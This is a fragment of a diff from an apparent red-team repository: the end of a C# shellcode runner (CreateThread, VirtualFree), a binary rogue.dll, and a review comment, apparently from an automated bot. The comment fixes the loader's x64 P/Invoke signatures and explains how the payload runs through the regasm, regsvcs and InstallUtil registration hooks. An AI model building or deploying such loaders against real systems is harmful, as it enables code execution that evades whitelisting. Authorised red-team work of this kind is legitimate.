|
||||||
|
|
||||||
|
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
|
||||||
|
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||||
|
|
||||||
|
CloseHandle(hThread);
|
||||||
|
VirtualFree(funcAddr, 0, MEM_RELEASE);
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
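Review bot: The P/Invoke declarations `CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, ...)` and `VirtualFree(IntPtr lpAddress, UInt32 dwSize, ...)` declare a pointer (LPSECURITY_ATTRIBUTES) and two SIZE_T parameters as 32-bit integers, which is wrong for the x64 build the README targets and inconsistent with the `UIntPtr dwSize` already used for `VirtualAlloc`; the zero values passed here happen to survive, but the signatures should be `IntPtr lpThreadAttributes, UIntPtr dwStackSize` and `UIntPtr dwSize`. `Execute()` also never checks the `VirtualAlloc` result, so on an allocation failure `Marshal.Copy` is handed a null pointer and will throw rather than fail cleanly; `if (funcAddr == IntPtr.Zero) return;` before the copy would cover it. The comment above `[ComUnregisterFunction]`, `// This executes if registration fails`, is inaccurate: that hook runs on unregistration, which is exactly the `regasm.exe /U rogue.dll` and `regsvcs.exe /U rogue.dll` paths the README documents, so it should read `// This executes on unregistration (regasm/regsvcs /U)`. The header comment still names `regsvcs.dll` for both the `csc.exe /out:` and the execution lines while the README and the committed binary use `rogue.dll`, and it omits the InstallUtil path this version adds. Since all three hooks call the same `Shellcode.Execute()`, an assembly that is registered and then unregistered runs the payload twice, which is worth one sentence in the header so operators are not surprised.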
BIN
red-teaming/rogue-dot-net/rogue.dll
Normal file
Binary file not shown.